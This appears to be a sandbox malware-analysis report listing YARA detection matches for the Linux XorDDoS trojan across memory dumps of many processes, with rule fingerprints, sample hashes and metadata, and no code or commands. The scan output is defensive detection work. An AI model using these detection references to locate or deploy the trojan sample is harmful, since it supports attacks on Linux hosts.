Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
